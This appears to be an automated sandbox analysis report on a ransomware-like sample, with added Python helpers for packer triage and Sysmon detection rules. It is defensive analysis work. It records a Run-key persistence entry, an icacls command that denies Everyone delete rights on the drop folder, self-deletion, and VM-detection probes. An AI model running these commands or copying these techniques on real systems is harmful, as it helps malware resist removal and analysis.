Source: C:\Windows\explorer.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.dll
Source: C:\Windows\explorer.exe Section loaded: pdh.dll
Source: C:\Windows\explorer.exe Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe Section loaded: cscui.dll
Source: C:\Windows\explorer.exe Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe Section loaded: npsm.dll
Source: C:\Windows\explorer.exe Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe Section loaded: mscms.dll
Source: C:\Windows\explorer.exe Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe Section loaded: tdh.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe Section loaded: icu.dll
Source: C:\Windows\explorer.exe Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe Section loaded: schannel.dll
Source: C:\Windows\explorer.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe Section loaded: container.dll
Source: C:\Windows\explorer.exe Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe Section loaded: samlib.dll
Source: C:\Windows\explorer.exe Section loaded: stobject.dll
Source: C:\Windows\explorer.exe Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe Section loaded: sxs.dll
Source: C:\Windows\explorer.exe Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe Section loaded: es.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe Section loaded: dxp.dll
Source: C:\Windows\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe Section loaded: audioses.dll
Source: C:\Windows\explorer.exe Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe Section loaded: wer.dll
Source: C:\Windows\explorer.exe Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe Section loaded: mpr.dll
Source: C:\Windows\explorer.exe Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe Section loaded: credui.dll
Source: C:\Windows\explorer.exe Section loaded: dui70.dll
Source: C:\Windows\explorer.exe Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe Section loaded: settingsync.dll
Source: C:\Windows\explorer.exe Section loaded: settingsynccore.dll
Source: C:\Windows\explorer.exe Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe Section loaded: msxml6.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc Section loaded: msvcr100.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\XVM5nluelx.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: XVM5nluelx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 33A3.exe, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\XVM5nluelx.exe Unpacked PE file: 0.2.XVM5nluelx.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\dejcbcc Unpacked PE file: 4.2.dejcbcc.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Unpacked PE file: 9.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Unpacked PE file: 14.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 16.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 23.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 26.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Unpacked PE file: 9.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Unpacked PE file: 14.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 16.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 23.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 26.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 9_2_00412220
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_004026D2 push ebx; ret 0_2_004026EA
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_004026ED pushad ; ret 0_2_004026F4
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_004026F7 push ebx; ret 0_2_00402714
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_00402745 push edi; ret 0_2_0040276D
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_0040273B push edi; ret 0_2_00402742
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_00402595 push ss; ret 0_2_0040259C
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_004027BB push edi; ret 0_2_0040276D
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E22822 push edi; ret 0_2_02E227D4
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E225FC push ss; ret 0_2_02E22603
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E227A2 push edi; ret 0_2_02E227A9
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E215A4 push AFD66869h; ret 0_2_02E215A9
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E227AC push edi; ret 0_2_02E227D4
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E22754 pushad ; ret 0_2_02E2275B
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E2275E push ebx; ret 0_2_02E2277B
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E22739 push ebx; ret 0_2_02E22751
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED44EA pushad ; iretd 0_2_02ED44EB
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED9CFD push ecx; retf 0_2_02ED9CFF
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED9A8D push eax; iretd 0_2_02ED9A8E
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED9C75 push esi; iretd 0_2_02ED9C77
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED9C71 push ds; retf 0_2_02ED9C73
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED33DD push AFD66869h; ret 0_2_02ED33E2
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED45AC push D23524A7h; retn 0006h 0_2_02ED45B4
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED9D33 push 4843A5D1h; retf 0_2_02ED9D3F
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_004026D2 push ebx; ret 4_2_004026EA
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_004026ED pushad ; ret 4_2_004026F4
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_004026F7 push ebx; ret 4_2_00402714
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_00402745 push edi; ret 4_2_0040276D
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_0040273B push edi; ret 4_2_00402742
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_00402595 push ss; ret 4_2_0040259C
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_004027BB push edi; ret 4_2_0040276D
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_02E22822 push edi; ret 4_2_02E227D4
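Added example (Python; not part of this report and not the sample's own code): a small triage helper for the two obfuscation indicators listed in this section. compare_sections reads the report's section-rights notation on the assumption that the text before "vs" describes the unpacked image and the text after it the on-disk PE, and reports an on-disk section that is both writable and executable (the single .text:EW of XVM5nluelx.exe and dejcbcc, a packer stub that rewrites itself) as well as sections present in only one of the two layouts. find_push_ret is a linear byte scan for adjacent push/ret pairs of the kind recorded above and reports the effective target of the push-immediate form, which is an obfuscated jmp. Because it is a byte scan it can also fire on bytes inside an immediate or a displacement, so confirm hits with a disassembler; a disassembler is also what is needed for the entries above where the push and ret addresses are not adjacent. The sample bytes are constructed.

```python
"""Triage helpers for the Data Obfuscation indicators above.

Added example; not part of the sandbox report and not code from the sample.
Assumption: in "A vs B" the left side lists the unpacked image's sections
and the right side the on-disk PE's sections.
"""
from typing import Dict, List, Tuple

# Section-rights strings copied from the "Unpacked PE file" lines above.
REPORT_SPECS = {
    "0.2.XVM5nluelx.exe.400000.0.unpack":
        ".text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;",
    "9.2.33A3.exe.400000.0.unpack":
        ".text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;",
}


def parse_rights(spec: str) -> Dict[str, str]:
    """'.text:ER;.rdata:R;' -> {'.text': 'ER', '.rdata': 'R'}"""
    rights = {}
    for item in filter(None, (s.strip() for s in spec.split(";"))):
        name, _, flags = item.partition(":")
        rights[name] = flags
    return rights


def compare_sections(spec: str) -> List[str]:
    """Findings for one 'unpacked vs original' spec, in a fixed order."""
    left, _, right = spec.partition(" vs ")
    unpacked, original = parse_rights(left), parse_rights(right)
    findings = []
    for name, flags in original.items():
        if "E" in flags and "W" in flags:
            findings.append(f"on-disk {name} is writable+executable (self-modifying stub)")
    for name in sorted(unpacked.keys() - original.keys()):
        findings.append(f"{name} exists only in the unpacked image")
    for name in sorted(original.keys() - unpacked.keys()):
        findings.append(f"{name} exists only on disk")
    for name in sorted(unpacked.keys() & original.keys()):
        if unpacked[name] != original[name]:
            findings.append(f"{name} rights changed {original[name]} -> {unpacked[name]}")
    return findings


# x86 opcodes: 0x50-0x57 push r32, 0x60 pushad, 0x16 push ss, 0x1E push ds,
# 0x68 push imm32; 0xC3 ret, 0xCB retf, 0xCF iretd.
PUSH_ONE_BYTE = {0x50 + i: f"push {r}" for i, r in enumerate(
    ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
PUSH_ONE_BYTE.update({0x60: "pushad", 0x16: "push ss", 0x1E: "push ds"})
RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_push_ret(code: bytes, base: int = 0) -> List[Tuple[int, str]]:
    """Adjacent push/ret pairs; 'push imm32; ret' is an obfuscated jmp imm32."""
    hits = []
    for i, b in enumerate(code):
        if b in PUSH_ONE_BYTE and i + 1 < len(code) and code[i + 1] in RETURNS:
            hits.append((base + i, f"{PUSH_ONE_BYTE[b]}; {RETURNS[code[i + 1]]}"))
        elif b == 0x68 and i + 5 < len(code) and code[i + 5] in RETURNS:
            imm = int.from_bytes(code[i + 1:i + 5], "little")
            hits.append((base + i, f"push {imm:08X}h; {RETURNS[code[i + 5]]} (jmp 0x{imm:08X})"))
    return hits


# Constructed bytes: push 4843A5D1h; retf | push ebx; ret | nop x3 | push ecx; retf
SAMPLE_CODE = b"\x68\xd1\xa5\x43\x48\xcb" + b"\x53\xc3" + b"\x90" * 3 + b"\x51\xcb"

if __name__ == "__main__":
    for name, spec in REPORT_SPECS.items():
        print(name, compare_sections(spec))
    for addr, text in find_push_ret(SAMPLE_CODE, base=0x02E215A4):
        print(f"{addr:08X}: {text}")
```

The 33A3.exe comparison shows only a missing .reloc in the unpacked image, which is what a memory dump of a normally loaded image looks like; the XVM5nluelx.exe and dejcbcc comparison is the packer signature, since a legitimate compiler does not emit a single RWX .text.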

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: reg.exe (4 times)
Source: C:\Users\user\AppData\Local\Temp\33A3.exe File created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\33A3.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dejcbcc (2 times)
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File created: C:\Users\user\_readme.txt
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper (2 times)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\xvm5nluelx.exe
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\dejcbcc:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 9_2_00481920
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (41 times)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Process information set: NOOPENFILEERRORBOX (12 times)
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (3 times)
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX (42 times)
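Added example (Python; not part of this report and not the sample's code): detection logic over constructed Sysmon-style events that reproduce the findings of this section and of the Persistence and Installation Behavior section above: explorer.exe, a system process that has no business doing this, writing 33A3.exe and dejcbcc into the user profile and deleting the original sample from the desktop; the Run value SysHelper set by a binary running from Temp; the executable dropped into a GUID-named directory under AppData\Local; the icacls /deny for S-1-1-0 (Everyone) on that directory; and _readme.txt written to more than one directory. Field names follow Sysmon (EventID, Image, TargetFilename, TargetObject, CommandLine); the event values are constructed from the paths above, and the rule weights are an assumption of this example.

```python
"""Detection rules for the persistence and self-hiding behaviour above.

Added example; not part of the sandbox report and not code from the sample.
The events are constructed Sysmon-style records (EventID 1 process create,
11 file create, 13 registry value set, 23 file delete) modelled on the
report's findings; field names follow Sysmon, values are illustrative.
"""
import re
from collections import defaultdict
from typing import Dict, List, Union

Event = Dict[str, Union[int, str]]

DROP_DIR = r"C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d"
EXPLORER = r"C:\Windows\explorer.exe"
STAGE1 = r"C:\Users\user\AppData\Local\Temp\33A3.exe"

EVENTS: List[Event] = [
    {"EventID": 11, "Image": EXPLORER, "TargetFilename": STAGE1},
    {"EventID": 11, "Image": EXPLORER, "TargetFilename": r"C:\Users\user\AppData\Roaming\dejcbcc"},
    {"EventID": 23, "Image": EXPLORER, "TargetFilename": r"C:\Users\user\Desktop\XVM5nluelx.exe"},
    {"EventID": 11, "Image": STAGE1, "TargetFilename": DROP_DIR + r"\33A3.exe"},
    {"EventID": 13, "Image": STAGE1,
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\icacls.exe", "ParentImage": STAGE1,
     "CommandLine": 'icacls "' + DROP_DIR + r'" /deny *S-1-1-0:(OI)(CI)(DE,DC)'},
    {"EventID": 11, "Image": DROP_DIR + r"\33A3.exe", "TargetFilename": r"C:\_readme.txt"},
    {"EventID": 11, "Image": DROP_DIR + r"\33A3.exe", "TargetFilename": r"C:\Users\user\_readme.txt"},
]
# Constructed benign control: a system binary writing a document.
BENIGN: List[Event] = [
    {"EventID": 11, "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\user\Documents\notes.txt"},
]

GUID_DIR_EXE = re.compile(
    r"\\AppData\\Local\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\[^\\]+\.exe$", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)

WEIGHTS = {                                      # assumed weights for this example
    "run_key_set_by_user_writable_binary": 2,
    "explorer_writes_to_user_writable_dir": 3,   # "benign process drops PE files"
    "exe_dropped_into_guid_named_dir": 2,
    "explorer_deletes_executable": 1,            # weak alone: users delete files via Explorer too
    "icacls_deny_everyone": 3,
    "ransom_note_fanout": 4,
}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _dir(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def evaluate(events: List[Event]) -> Dict[str, List[str]]:
    """Return rule name -> matching artefacts for every rule that fired."""
    hits: Dict[str, List[str]] = defaultdict(list)
    note_dirs = set()
    for e in events:
        eid, image = e.get("EventID"), str(e.get("Image", ""))
        target = str(e.get("TargetFilename", ""))
        if eid == 13 and RUN_KEY.search(str(e.get("TargetObject", ""))) and USER_WRITABLE.search(image):
            hits["run_key_set_by_user_writable_binary"].append(str(e["TargetObject"]))
        if eid == 11 and _base(image) == "explorer.exe" and USER_WRITABLE.search(target):
            hits["explorer_writes_to_user_writable_dir"].append(target)
        if eid == 11 and GUID_DIR_EXE.search(target):
            hits["exe_dropped_into_guid_named_dir"].append(target)
        if eid == 11 and _base(target) == "_readme.txt":
            note_dirs.add(_dir(target))
        if eid == 23 and _base(image) == "explorer.exe" and target.lower().endswith(".exe"):
            hits["explorer_deletes_executable"].append(target)
        if eid == 1 and _base(image) == "icacls.exe":
            cmd = str(e.get("CommandLine", ""))
            if "/deny" in cmd.lower() and "S-1-1-0" in cmd:   # S-1-1-0 is the Everyone SID
                hits["icacls_deny_everyone"].append(cmd)
    if len(note_dirs) >= 2:   # the same note name written into several directories
        hits["ransom_note_fanout"] = sorted(note_dirs)
    return dict(hits)


def score(hits: Dict[str, List[str]]) -> int:
    return sum(WEIGHTS.get(rule, 1) for rule in hits)


if __name__ == "__main__":
    found = evaluate(EVENTS)
    for rule, items in found.items():
        print(f"{rule} (weight {WEIGHTS[rule]}):", *items, sep="\n  ")
    print("score:", score(found), "benign:", score(evaluate(BENIGN)))
```

The icacls deny on the drop directory and the Everyone SID are the strongest single signal here: a user-mode program that blocks deletion of its own folder for every principal is trying to survive cleanup, and the same command line is what a responder must undo (icacls /remove:d) before the dropped copy can be removed. The Zone.Identifier stream removal recorded above is not covered by these rules, because Sysmon records stream creation (Event ID 15) rather than stream deletion, so that indicator needs file-system auditing or EDR telemetry.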

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\XVM5nluelx.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 times)
Source: C:\Users\user\AppData\Roaming\dejcbcc Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (12 times)
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
